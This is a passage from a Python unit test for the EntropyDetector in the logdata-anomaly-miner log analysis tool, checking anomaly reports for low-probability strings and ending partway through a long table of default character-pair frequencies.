ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # prob_thresh 50% ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.5, learn_mode=True, output_logline=False) total_freq = {} freq = {} ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 2).strftime(dtf), ed.__class__.__name__, 1, "logdata-anomaly-miner")) self.reset_output_stream() self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(dtf), ed.__class__.__name__, 1, "ait-aecid")) self.reset_output_stream() self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), ed.__class__.__name__, 1, "austrian")) self.reset_output_stream() self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), ed.__class__.__name__, 1, "institute")) self.reset_output_stream() self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # default_freqs = True ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], default_freqs=True, learn_mode=True, output_logline=False) default_f = [True, "\n\t~`!@#$%^&*()_+-", [["\f", [["f", 2]]], [" ", [[" ", 312527], ["$", 12], ["(", 1520], [",", 6], ["0", 2], ["4", 210], ["8", 75], ["<", 58], ["D", 5449], ["H", 14898], ["L", 6849], ["P", 10276], ["T", 23773], ["X", 290], ["`", 1958], ["d", 74474], ["h", 195782], ["l", 64742], ["p", 65902], ["t", 408490], ["x", 22], ["|", 38], ["#", 6], ["'", 3062], ["+", 2], ["/", 12], ["3", 300], ["7", 134], [";", 8], ["?", 8], ["C", 9334], ["G", 5688], ["K", 2484], ["O", 4266], ["S", 13139], ["W", 9355], ["[", 408], ["_", 220], ["c", 90632], ["g", 44086], ["k", 13940], ["o", 161371], ["s", 182472], ["w", 187994], ["{", 8], ["\"", 22346], ["&", 42], ["*", 112], [".", 2358], ["2", 691], ["6", 180], [":", 14], [">", 2], ["B", 12213], ["F", 8428], ["J", 5957], ["N", 7370], ["R", 5046], ["V", 3389], ["Z", 250], ["b", 109654], ["f", 95818], ["j", 6186], ["n", 56010], ["r", 54486], ["v", 15242], ["z", 238], ["~", 2], ["%", 2], [")", 2], ["-", 550], ["1", 1613], ["5", 132], ["9", 74], ["A", 16635], ["E", 4590], ["I", 45393], ["M", 17353], ["Q", 356], ["U", 753], ["Y", 2574], ["a", 293192], ["e", 47200], ["i", 125201], ["m", 99016], ["q", 5914], ["u", 27850], ["y", 29288]]], ["$", [[" ", 2], ["3", 2], ["2", 6], ["4", 10]]], ["(", [[" ", 2], ["\"", 34], ["$", 12], ["'", 24], ["*", 8], ["1", 28], ["3", 24], ["2", 30], ["5", 2], ["A", 54], ["C", 12], ["B", 32], ["E", 12], ["D", 16], ["G", 6], ["F", 40], ["I", 120], ["H", 48], ["K", 10], ["J", 2], ["M", 48], ["L", 14], ["O", 20], ["N", 26], ["P", 26], ["S", 46], ["U", 8], ["T", 124], ["W", 38], ["V", 2], ["Y", 4], ["_", 14], ["a", 306], ["`", 2], ["c", 22], ["b", 50], ["e", 24], ["d", 18], ["g", 10], ["f", 80], ["i", 122], ["h", 102], ["k", 2], ["j", 2], ["m", 20], ["l", 20], ["o", 86], ["n", 38], ["p", 16], ["s", 106], ["r", 6], ["u", 6], ["t", 240], ["w", 212], ["v", 2], ["y", 6], ["~", 8]]], [",", [["!", 2], [" ", 200706], ["\"", 10148], ["'", 1656], [")", 4], ["*", 18], ["-", 780], [",", 10], ["1", 40], ["0", 263], ["3", 6], ["2", 42], ["5", 44], ["4", 28], ["7", 4], ["6", 20], ["9", 12], ["8", 18], [":", 4], ["A", 4], ["I", 42], ["J", 2], ["M", 2], ["T", 2], ["[", 2], ["a", 328], ["c", 8], ["b", 76], ["e", 6], ["d", 4], ["g", 10], ["f", 60], ["i", 36], ["h", 36], ["k", 6], ["m", 10], ["l", 6], ["o", 22], ["n", 8], ["q", 2], ["p", 2], ["s", 64], ["r", 8], ["t", 84], ["w", 70]]], ["0", [[" ", 512], ["%", 16], ["'", 14], [")", 20], ["-", 20], [",", 155], [".", 70], ["1", 38], ["0", 714], ["3", 17], ["2", 32], ["5", 34], ["4", 13], ["7", 30], ["6", 21], ["9", 34], ["8", 20], [";", 8], [":", 22], ["@", 20], ["I", 6], ["]", 46], ["m", 2], ["s", 6], ["t", 74], ["x", 10], ["}", 18]]], ["4", [[" ", 70], ["'", 4], [")", 2], ["-", 12], [",", 70], [".", 46], ["1", 24], ["0", 82], ["3", 24], ["2", 24], ["5", 34], ["4", 16], ["7", 28], ["6", 16], ["9", 24], ["8", 34], [";", 6], [":", 44], ["@", 8], ["T", 2], ["]", 60], ["t", 64], ["}", 18], ["|", 32]]], ["8", [[" ", 64], ["'", 6], ["-", 12], [",", 68], [".", 28], ["1", 192], ["0", 155], ["3", 132], ["2", 89], ["5", 26], ["4", 56], ["7", 26], ["6", 74], ["9", 37], ["8", 12], [";", 12], [":", 14], ["?", 2], ["@", 10], ["]", 54], ["m", 2], ["t", 56], ["}", 18], ["|", 44]]], ["<", [["A", 64], ["C", 132], ["B", 10], ["E", 18], ["D", 14], ["G", 4], ["F", 20], ["I", 14], ["H", 94], ["K", 2], ["M", 14], ["L", 8], ["O", 14], ["N", 2], ["P", 14], ["S", 14], ["R", 10], ["T", 224], ["W", 24], ["Y", 2], ["m", 2], ["s", 2]]], ["@", [[" ", 102], ["c", 8], ["e", 14], [",", 8], [".", 8], ["u", 6], ["v", 16]]], ["D", [["!", 4], [" ", 358], ["'", 72], ["*", 16], ["-", 64], [",", 14], [".", 66], [";", 2], ["?", 2], ["A", 93], ["C", 2], ["E", 240], ["D", 2], ["G", 10], ["F", 8], ["I", 220], ["M", 2], ["L", 2], ["O", 89], ["N", 14], ["P", 2], ["S", 28], ["R", 70], ["U", 24], ["V", 2], ["Y", 12], ["a", 1027], ["e", 2124], ["i", 779], ["j", 6], ["m", 148], ["o", 2366], ["n", 8], ["r", 642], ["u", 914], ["w", 4], ["y", 20]]], ["H", [[" ", 112], ["'", 14], [",", 8], [".", 210], ["1", 126], ["3", 42], ["2", 54], ["5", 12], ["4", 12], ["7", 12], ["6", 12], ["9", 12], ["8", 12], ["?", 2], ["A", 410], ["E", 722], ["F", 4], ["I", 298], ["M", 4], ["O", 260], ["N", 2], ["Q", 4], ["S", 6], ["R", 20], ["U", 26], ["T", 60], ["Y", 20], ["a", 2890], ["e", 16114], ["i", 2886], ["h", 2], ["m", 2], ["o", 2880], ["s", 4], ["u", 596], ["v", 2], ["y", 24]]], ["L", [["!", 2], [" ", 102], ["'", 40], [")", 2], ["-", 4], [",", 10], [".", 40], ["1", 6], ["2", 8], ["5", 2], ["4", 2], ["6", 2], ["8", 2], [":", 8], ["A", 120], ["C", 14], ["E", 261], ["D", 38], ["G", 14], ["F", 26], ["I", 210], ["H", 4], ["K", 46], ["J", 2], ["M", 6], ["L", 134], ["O", 98], ["N", 2], ["P", 4], ["S", 36], ["R", 6], ["U", 84], ["T", 12], ["W", 2], ["Y", 32], ["a", 2534], ["e", 1957], ["i", 1482], ["h", 70], ["l", 2], ["o", 2216], ["u", 614], ["w", 2], ["y", 30]]], ["P", [["!", 2], [" ", 30], ["-", 4], [".", 72], ["A", 198], ["E", 228], ["G", 8], ["I", 66], ["H", 24], ["K", 2], ["M", 8], ["L", 90], ["O", 110], ["P", 26], ["S", 18], ["R", 198], ["U", 54], ["T", 202], ["Y", 10], ["a", 2387], ["e", 1866], ["f", 50], ["i", 2690], ["h", 472], ["l", 486], ["o", 1094], ["s", 84], ["r", 4898], ["u", 314], ["t", 12], ["w", 2], ["y", 38]]], ["T", [["!", 20], [" ", 496], ["'", 18], ["*", 34], ["-", 20], [",", 66], [".", 132], [":", 6], ["A", 150], ["C", 14], ["B", 2], ["E", 2568], ["F", 2], ["I", 236], ["H", 1216], ["M", 20], ["L", 24], ["O", 330], ["N", 14], ["P", 14], ["S", 62], ["R", 71], ["U", 70], ["T", 106], ["W", 110], ["Y", 144], ["Z", 2], ["a", 643], ["e", 802], ["i", 1134], ["h", 41758], ["o", 3328], ["s", 100], ["r", 532], ["u", 500], ["w", 517], ["v", 8], ["y", 54], ["z", 4]]], ["X", [["A", 2], [" ", 22], ["C", 6], ["E", 2], ["'", 2], ["I", 444], ["-", 2], [",", 4], [".", 84], ["1", 2], ["P", 6], ["2", 2], ["u", 30], ["T", 78], ["V", 302], ["X", 266], [":", 6], ["e", 4]]], ["`", [[" ", 4], ["\"", 2], ["'", 2], ["2", 2], ["A", 122], ["C", 26], ["B", 74], ["E", 14], ["D", 38], ["G", 30], ["F", 28], ["I", 270], ["H", 66], ["K", 4], ["J", 30], ["M", 66], ["L", 44], ["O", 26], ["N", 52], ["P", 34], ["S", 80], ["R", 14], ["U", 6], ["T", 166], ["W", 92], ["V", 4], ["Y", 66], ["_", 2], ["a", 62], ["c", 32], ["b", 40], ["e", 40], ["d", 24], ["g", 28], ["f", 38], ["i", 24], ["h", 26], ["k", 6], ["j", 2], ["m", 40], ["l", 28], ["o", 24], ["n", 14], ["q", 2], ["p", 40], ["s", 34], ["r", 18], ["u", 10], ["t", 98], ["w", 22], ["v", 2], ["y", 8]]], ["d", [["!", 1346], [" ", 316392], ["\"", 78], ["'", 892], [")", 158], ["-", 2110], [",", 27454], [".", 15448], ["1", 6], [";", 2238], [":", 1318], ["?", 904], [">", 32], ["]", 6], ["_", 10], ["a", 15612], ["`", 12], ["c", 64], ["b", 98], ["e", 66856], ["d", 5952], ["g", 2672], ["f", 682], ["i", 36856], ["h", 178], ["k", 152], ["j", 316], ["m", 1162], ["l", 4894], ["o", 27386], ["n", 2680], ["q", 32], ["p", 44], ["s", 12352], ["r", 13004], ["u", 5376], ["t", 176], ["w", 382], ["v", 1300], ["y", 5438], ["z", 4], ["}", 6]]], ["h", [["!", 1480], [" ", 66490], ["\"", 16], ["'", 580], [")", 46], ["-", 674], [",", 7634], [".", 3060], [";", 500], [":", 124], ["?", 354], [">", 8], ["_", 8], ["a", 130321], ["`", 2], ["c", 78], ["b", 454], ["e", 366316], ["d", 180], ["g", 2], ["f", 464], ["i", 118000], ["h", 16], ["k", 98], ["m", 1012], ["l", 810], ["o", 56794], ["n", 878], ["q", 34], ["p", 20], ["s", 1392], ["r", 8693], ["u", 9628], ["t", 23686], ["w", 410], ["v", 4], ["y", 4342], ["z", 2]]], ["l", [["!", 688], [" ", 55493], ["\"", 28], ["'", 776], [")", 58], ["*", 8], ["-", 1168], [",", 9058], ["/", 2], [".", 4175], ["1", 2], ["2", 4], [";", 588], [":", 138], ["?", 512], [">", 18], ["@", 2], ["]", 2], ["_", 14], ["a", 40424], ["c", 880], ["b", 428], ["e", 90647], ["d", 35897], ["g", 498], ["f", 11866], ["i", 53960], ["h", 30], ["k", 3952], ["j", 880], ["m", 2350], ["l", 72010], ["o", 43088], ["n", 488], ["q", 6], ["p", 1936], ["s", 9240], ["r", 1482], ["u", 8878], ["t", 7890], ["w", 1710], ["v", 3288], ["y", 43772], ["x", 2], ["z", 52]]], ["p", [["!", 222], [" ", 12684], ["\"", 12], ["'", 274], [")", 8], ["*", 16], ["-", 458], [",", 2678], [".", 1598], [";", 206], [":", 32], ["?", 102], [">", 2], ["_", 2], ["a", 24384], ["c", 110], ["b", 74], ["e", 40018], ["d", 12], ["g", 26], ["f", 100], ["i", 12578], ["h", 3890], ["k", 248], ["m", 220], ["l", 19938], ["o", 24960], ["n", 82], ["p", 12676], ["s", 4980], ["r", 27372], ["u", 7468], ["t", 8624], ["w", 150], ["y", 1538], ["z", 4]]], ["t", [["!", 1698], [" ", 244288], ["\"", 74], ["'", 4144], [")", 206], ["*", 10], ["-", 2634], [",", 24442], ["/", 22], [".", 15012], ["9", 30], [";", 1952], [":", 386], ["?", 2014], [">", 34], ["@", 16], ["I", 4], ["N", 2], ["]", 6], ["_", 20], ["a", 36864], ["c", 4804], ["b", 164], ["e", 93708], ["d", 32], ["g", 50], ["f", 1186], ["i", 67393], ["h", 380618], ["k", 30], ["j", 2], ["m", 1109], ["l", 15192], ["o", 120320], ["n", 980], ["p", 168], ["s", 20376], ["r", 31046], ["u", 18070], ["t", 25046], ["w", 8348], ["v", 6], ["y", 14950], ["x", 22], ["z", 596]]], ["x", [["!", 16], [" ", 1654], ["'", 108], [")", 6], ["-", 174], [",", 480], ["/", 2], [".", 262], ["1", 10], [";", 40], [":", 6], ["?", 20], ["_", 4], ["a", 1314], ["c", 2462], ["b", 4], ["e", 1456], ["g", 2], ["f", 26], ["i", 1676], ["h", 354], ["l", 20], ["o", 82], ["q", 56], ["p", 3828], ["s", 6], ["u", 144], ["t", 3514], ["w", 4], ["y", 88], ["x", 30]]], ["|", [[" ", 30], ["C", 294]]], ["#", [["1", 6], [" ", 2]]], ["'", [["!", 22], [" ", 5218], ["\"", 130], ["'", 52], [")", 8], ["-", 136], [",", 274], [".", 194], ["9", 24], ["8", 10], [";", 12], [":", 4], ["?", 40], ["A", 506], ["C", 94], ["B", 292], ["E", 88], ["D", 124], ["G", 154], ["F", 90], ["I", 826], ["H", 360], ["K", 12], ["J", 52], ["M", 174], ["L", 102], ["O", 202], ["N", 222], ["Q", 12], ["P", 86], ["S", 328], ["R", 24], ["U", 38], ["T", 922], ["W", 482], ["V", 22], ["Y", 356], ["a", 288], ["c", 614], ["b", 42], ["e", 614], ["d", 2832], ["g", 48], ["f", 28], ["i", 98], ["h", 36], ["k", 6], ["m", 1148], ["l", 1792], ["o", 90], ["n", 44], ["q", 2], ["p", 40], ["s", 16835], ["r", 660], ["u", 62], ["t", 7172], ["w", 60], ["v", 880], ["y", 66], ["}", 2]]], ["+", [[";", 2], ["B", 2], ["-", 4]]], ["/", [[" ", 26], ["\"", 2], ["e", 20], ["I", 14], ["h", 6], ["1", 2], ["s", 2], ["2", 4], ["5", 4], ["4", 2], ["6", 2]]], ["3", [["!", 2], [" ", 76], [")", 18], ["*", 8], ["-", 6], [",", 98], ["/", 2], [".", 66], ["1", 54], ["0", 158], ["3", 44], ["2", 60], ["5", 42], ["4", 18], ["7", 38], ["6", 24], ["9", 26], ["8", 20], [";", 10], [":", 48], ["?", 2], ["@", 4], ["]", 60], ["d", 6], ["i", 4], ["h", 2], ["r", 50], ["t", 26], ["v", 2], ["}", 18], ["|", 38]]], ["7", [["!", 2], [" ", 64], ["'", 10], ["-", 8], [",", 68], ["/", 4], [".", 46], ["1", 21], ["0", 36], ["3", 12], ["2", 35], ["5", 16], ["4", 14], ["7", 32], ["6", 26], ["9", 40], ["8", 34], [";", 10], [":", 28], ["@", 18], ["]", 48], ["h", 2], ["m", 4], ["t", 34], ["}", 18], ["|", 26]]], [";", [[" ", 14368], ["\"", 42], ["'", 54], ["h", 2], ["*", 2], ["-", 146], [",", 2], ["[", 4]]], ["?", [[" ", 5000], ["\"", 7386], ["'", 680], [")", 14], ["-", 90], [",", 2], [".", 118], ["[", 2], ["?", 2], [">", 2]]], ["C", [[" ", 50], ["\"", 14], ["'", 12], ["*", 2], ["-", 4], [",", 6], ["/", 2], [".", 24], ["A", 126], ["C", 22], ["E", 112], ["D", 20], ["I", 76], ["H", 3260], ["K", 60], ["L", 26], ["O", 164], ["P", 6], ["S", 8], ["R", 38], ["U", 26], ["T", 117], ["Y", 16], ["a", 2763], ["e", 294], ["i", 277], ["h", 2428], ["l", 446], ["o", 4926], ["s", 4], ["r", 556], ["u", 212], ["y", 42], ["z", 24]]], ["G", [["!", 2], [" ", 132], ["\"", 8], ["'", 8], ["-", 56], [",", 22], [".", 10], [";", 2], [":", 2], ["?", 4], ["A", 72], ["E", 134], ["G", 10], ["F", 2], ["I", 34], ["H", 70], ["L", 16], ["O", 60], ["N", 14], ["S", 10], ["R", 64], ["U", 92], ["T", 2], ["Y", 2], ["Z", 2], ["a", 744], ["e", 958], ["d", 2], ["i", 460], ["h", 266], ["l", 212], ["o", 2628], ["n", 6], ["r", 1160], ["u", 880], ["w", 2], ["y", 2]]], ["K", [[" ", 28], ["'", 2], [",", 6], [".", 8], ["?", 2], ["A", 4], ["E", 64], ["F", 2], ["I", 44], ["H", 2], ["K", 4], ["L", 12], ["O", 2], ["N", 4], ["S", 12], ["R", 6], ["U", 2], ["W", 4], ["Y", 2], ["a", 442], ["e", 504], ["i", 860], ["h", 122], ["l", 40], ["o", 290], ["n", 96], ["r", 96], ["u", 782], ["y", 10]]], ["O", [["!", 6], [" ", 466], ["\"", 2], ["'", 106], ["-", 4], [",", 12], [".", 38], [":", 2], ["?", 2], ["A", 6], ["C", 47], ["B", 32], ["E", 13], ["D", 52], ["G", 52], ["F", 288], ["I", 18], ["H", 28], ["K", 222], ["J", 50], ["M", 160], ["L", 98], ["O", 78], ["N", 489], ["P", 30], ["S", 64], ["R", 346], ["U", 338], ["T", 104], ["W", 64], ["V", 39], ["Y", 8], ["Z", 2], ["a", 2], ["c", 234], ["b", 128], ["e", 2], ["d", 26], ["g", 14], ["f", 1458], ["i", 6], ["h", 1000], ["k", 2], ["m", 60], ["l", 240], ["o", 44], ["n", 3744], ["p", 86], ["s", 22], ["r", 798], ["u", 554], ["t", 162], ["w", 32], ["v", 74], ["y", 2], ["x", 6], ["z", 68]]], ["S", [["!", 8], [" ", 616], ["'", 12], ["*", 6], ["-", 20], [",", 40], [".", 122], [";", 2], [":", 12], ["?", 2], ["A", 56], ["C", 58], ["E", 296], ["D", 2], ["G", 4], ["F", 4], ["I", 91], ["H", 76], ["K", 8], ["M", 14], ["L", 10], ["O", 98], ["N", 2], ["Q", 4], ["P", 30], ["S", 104], ["R", 2], ["U", 42], ["T", 322], ["W", 4], ["Y", 2], ["a", 2150], ["c", 1208], ["e", 1405], ["i", 968], ["h", 5152], ["k", 34], ["m", 374], ["l", 166], ["o", 4132], ["n", 120], ["q", 44], ["p", 776], ["s", 2], ["u", 1246], ["t", 1564], ["w", 144], ["v", 8], ["y", 126], ["z", 18]]], ["W", [["!", 2], [" ", 58], [")", 2], [",", 10], [".", 28], ["A", 136], ["E", 96], ["D", 4], ["G", 2], ["I", 90], ["H", 128], ["L", 4], ["O", 76], ["N", 12], ["S", 2], ["R", 8], ["Y", 4], ["a", 1096], ["e", 4362], ["i", 2096], ["h", 10098], ["o", 1611], ["r", 58], ["u", 18]]], ["[", [["*", 2], ["1", 112], ["3", 56], ["2", 112], ["5", 30], ["4", 40], ["7", 4], ["6", 34], ["9", 4], ["8", 2], ["A", 12], ["C", 2], ["B", 6], ["E", 24], ["D", 4], ["G", 14], ["F", 2], ["I", 22], ["H", 30], ["J", 34], ["M", 28], ["L", 16], ["N", 4], ["P", 42], ["S", 6], ["R", 36], ["T", 18], ["W", 4], ["a", 2], ["b", 4], ["d", 2], ["g", 2], ["f", 14], ["m", 2], ["l", 4], ["o", 4], ["p", 6], ["s", 4], ["t", 50]]], ["_", [[" ", 100], ["'", 2], ["-", 12], [",", 38], [".", 28], [";", 4], ["A", 14], ["D", 2], ["I", 30], ["H", 4], ["M", 4], ["L", 2], ["O", 2], ["N", 2], ["T", 12], ["_", 736], ["^", 6], ["a", 14], ["c", 12], ["b", 4], ["e", 6], ["d", 6], ["f", 14], ["i", 4], ["h", 2], ["m", 8], ["l", 6], ["o", 2], ["n", 14], ["p", 4], ["s", 10], ["r", 2], ["u", 4], ["t", 10], ["w", 8], ["v", 4], ["y", 4], ["x", 4]]], ["c", [["!", 38], [" ", 2940], ["\"", 6], ["'", 62], ["-", 122], [",", 498], [".", 480], [";", 56], [":", 18], ["?", 22], ["C", 8], ["G", 8], ["F", 2], ["L", 230], ["Q", 2], ["P", 2], ["S", 2], ["a", 38996], ["c", 5012], ["e", 54872], ["d", 38], ["i", 13186], ["h", 55038], ["k", 20111], ["m", 4], ["l", 12408], ["o", 57624], ["n", 26], ["q", 496], ["p", 66], ["s", 944], ["r", 13732], ["u", 9748], ["t", 19868], ["w", 8], ["v", 6], ["y", 1692], ["z", 12]]], ["g", [["!", 572], [" ", 77496], ["\"", 32], ["'", 490], [")", 44], ["-", 1388], [",", 8820], [".", 5284], [";", 654], [":", 276], ["?", 530], [">", 4], ["a", 16556], ["c", 8], ["b", 10], ["e", 31120], ["d", 134], ["g", 3662], ["f", 14], ["i", 11514], ["h", 36708], ["m", 368], ["l", 8714], ["o", 16464], ["n", 4300], ["p", 22], ["s", 6714], ["r", 16774], ["u", 6849], ["t", 1104], ["w", 42], ["y", 516], ["z", 14], ["}", 8]]], ["k", [["!", 306], [" ", 20132], ["\"", 14], ["'", 392], [")", 32], ["-", 554], [",", 4148], [".", 2414], ["1", 2], [";", 294], [":", 60], ["?", 214], [">", 10], ["@", 10], ["a", 870], ["c", 66], ["b", 38], ["e", 34087], ["d", 24], ["g", 58], ["f", 344], ["i", 13220], ["h", 948], ["k", 244], ["j", 22], ["m", 100], ["l", 2880], ["o", 816], ["n", 11134], ["q", 2], ["p", 12], ["s", 4228], ["r", 68], ["u", 68], ["t", 20], ["w", 314], ["v", 10], ["y", 768], ["z", 2]]], ["o", [["!", 648], [" ", 114177], ["\"", 18], ["'", 1162], [")", 38], ["-", 958], [",", 5210], [".", 2232], [";", 354], [":", 58], ["?", 516], ["K", 2], ["J", 2], ["]", 4], ["_", 6], ["a", 7834], ["`", 2], ["c", 9710], ["b", 5854], ["e", 2996], ["d", 16602], ["g", 5294], ["f", 99287], ["i", 10524], ["h", 872], ["k", 14852], ["j", 986], ["m", 51326], ["l", 30027], ["o", 36626], ["n", 131194], ["q", 172], ["p", 16136], ["s", 26802], ["r", 99219], ["u", 128095], ["t", 47116], ["w", 48246], ["v", 20522], ["y", 3366], ["x", 840], ["z", 456], ["}", 2]]], ["s", [["!", 2144], [" ", 245069], ["\"", 154], ["'", 1554], [")", 266], ["*", 14], ["-", 1948], [",", 37726], [".", 19990], ["1", 4], [";", 3000], [":", 928], ["=", 2], ["?", 1424], [">", 50], ["[", 6], ["]", 38], ["_", 24], ["a", 37342], ["c", 11410], ["b", 1092], ["e", 89922], ["d", 372], ["g", 288], ["f", 1206], ["i", 41018], ["h", 48184], ["k", 7002], ["j", 20], ["m", 5638], ["l", 7892], ["o", 41490], ["n", 2836], ["q", 1070], ["p", 17022], ["s", 38918], ["r", 118], ["u", 22362], ["t", 98283], ["w", 5082], ["v", 104], ["y", 2112], ["z", 8]]], ["w", [["!", 302], [" ", 25552], ["\"", 32], ["'", 332], [")", 38], ["-", 630], [",", 4620], ["/", 2], [".", 2130], [";", 296], [":", 56], ["?", 312], [">", 6], ["_", 4], ["a", 69912], ["c", 62], ["b", 88], ["e", 43746], ["d", 980], ["g", 230], ["f", 300], ["i", 50742], ["h", 55558], ["k", 232], ["j", 2], ["m", 12], ["l", 1768], ["o", 28157], ["n", 11280], ["p", 14], ["s", 3452], ["r", 3078], ["u", 116], ["t", 106], ["w", 8], ["y", 240], ["z", 2]]], ["{", [["`", 2], ["c", 2], ["E", 2], ["G", 2], ["s", 6], ["o", 4], ["1", 224], ["3", 226], ["2", 230], ["5", 24], ["4", 34], ["7", 22], ["6", 22], ["9", 22], ["8", 24], ["t", 8]]], ["\"", [[" ", 19496], ["\"", 12], ["'", 120], [")", 34], ["*", 70], ["-", 198], [",", 42], [".", 98], ["1", 4], ["3", 2], ["2", 4], ["5", 4], ["4", 4], ["6", 2], ["8", 6], [";", 74], [":", 2], ["?", 4], ["A", 4542], ["C", 1250], ["B", 2388], ["E", 472], ["D", 1474], ["G", 1096], ["F", 924], ["I", 8984], ["H", 2746], ["K", 138], ["J", 270], ["M", 1850], ["L", 912], ["O", 1848], ["N", 2630], ["Q", 110], ["P", 880], ["S", 1906], ["R", 350], ["U", 236], ["T", 5524], ["W", 6722], ["V", 340], ["Y", 4228], ["X", 4], ["[", 14], ["Z", 6], ["]", 8], ["_", 20], ["a", 732], ["`", 158], ["c", 118], ["b", 452], ["e", 46], ["d", 138], ["g", 54], ["f", 182], ["i", 408], ["h", 256], ["k", 10], ["j", 14], ["m", 148], ["l", 118], ["o", 112], ["n", 94], ["q", 4], ["p", 130], ["s", 230], ["r", 36], ["u", 32], ["t", 1014], ["w", 398], ["v", 22], ["y", 272]]], ["&", [["h", 2], ["c", 8], [" ", 26]]], ["*", [[" ", 206], ["\"", 146], [")", 6], ["*", 636], [",", 12], [".", 4], [":", 8], [">", 2], ["A", 16], ["C", 4], ["B", 16], ["E", 20], ["D", 8], ["G", 2], ["F", 12], ["I", 6], ["H", 4], ["K", 4], ["L", 4], ["O", 6], ["N", 2], ["P", 2], ["S", 16], ["T", 92], ["W", 18], ["V", 14], ["Y", 2], ["[", 36], ["]", 54], ["n", 6]]], [".", [["!", 36], [" ", 88376], ["\"", 12990], ["'", 1624], [")", 132], ["(", 2], ["*", 27], ["-", 436], [",", 236], [".", 4176], ["0", 16], ["2", 8], ["4", 6], ["7", 2], ["6", 2], ["9", 14], [";", 20], [":", 166], ["?", 38], ["A", 46], ["C", 12], ["B", 12], ["E", 20], ["D", 4], ["G", 22], ["F", 12], ["I", 138], ["H", 38], ["K", 2], ["J", 2], ["M", 34], ["L", 10], ["O", 10], ["N", 20], ["Q", 2], ["P", 8], ["S", 38], ["R", 2], ["U", 4], ["T", 108], ["W", 42], ["V", 6], ["Y", 20], ["[", 26], ["]", 10], ["_", 8], ["a", 4], ["`", 6], ["c", 32], ["b", 2], ["e", 36], ["i", 16], ["m", 26], ["o", 2], ["s", 4], ["u", 24], ["t", 40], ["x", 10], ["z", 2]]], ["2", [[" ", 128], ["\"", 2], ["'", 6], [")", 12], ["*", 6], ["-", 20], [",", 132], ["/", 2], [".", 82], ["1", 127], ["0", 229], ["3", 90], ["2", 98], ["5", 112], ["4", 96], ["7", 78], ["6", 88], ["9", 51], ["8", 80], [";", 4], [":", 56], ["@", 14], ["]", 70], ["d", 6], ["n", 28], ["t", 20], ["}", 20], ["|", 66]]], ["6", [[" ", 60], ["-", 12], [",", 70], ["/", 2], [".", 30], ["1", 24], ["0", 76], ["3", 14], ["2", 34], ["5", 26], ["4", 19], ["7", 26], ["6", 32], ["9", 21], ["8", 22], [";", 10], [":", 32], ["?", 2], ["@", 10], ["]", 44], ["m", 4], ["t", 68], ["}", 18], ["|", 52]]], [":", [[" ", 3056], ["\"", 2], ["'", 20], [")", 2], ["(", 8], ["*", 2], ["-", 1142], [".", 260], ["1", 118], ["I", 4], ["3", 44], ["2", 90], ["5", 14], ["4", 30], ["7", 14], ["6", 16], ["9", 12], ["8", 12], ["R", 4], ["r", 4]]], [">", [[" ", 88], ["#", 2], ["\"", 4], ["$", 2], ["-", 2], [",", 2], [":", 2], ["<", 24], ["A", 2], ["@", 2], ["C", 2], ["F", 8], ["I", 10], ["M", 2], ["L", 2], ["T", 14], ["W", 4], ["_", 2], ["^", 2], ["a", 6], ["c", 8], ["f", 10], ["i", 12], ["h", 6], ["m", 8], ["o", 8], ["p", 2], ["s", 8], ["t", 8], ["w", 6], ["v", 2], ["{", 2]]], ["B", [[" ", 16], ["'", 2], [",", 4], [".", 12], ["A", 44], ["C", 38], ["B", 6], ["E", 200], ["I", 62], ["K", 702], ["M", 6], ["L", 69], ["O", 247], ["S", 8], ["R", 26], ["U", 52], ["Y", 62], ["a", 2602], ["e", 3594], ["i", 1068], ["h", 100], ["j", 2], ["l", 520], ["o", 2392], ["r", 974], ["u", 8016], ["w", 2], ["y", 828]]], ["F", [["A", 194], [" ", 300], ["E", 36], ["F", 18], ["I", 98], ["j", 2], ["l", 372], ["O", 166], [",", 2], [">", 2], ["i", 958], ["r", 5046], ["U", 14], ["o", 3334], ["a", 2482], ["e", 430], ["R", 78], [".", 10], ["u", 184], ["L", 20], ["T", 30]]], ["J", [["A", 18], ["a", 1388], ["E", 82], ["d", 2], ["'", 2], ["I", 2], ["-", 2], ["o", 2830], [".", 132], ["i", 314], ["s", 2], ["U", 30], ["O", 54], ["e", 1904], ["u", 1679]]], ["N", [["!", 6], [" ", 451], ["\"", 8], ["'", 28], ["-", 4], [",", 48], [".", 96], [";", 2], [":", 8], ["?", 2], ["A", 108], ["C", 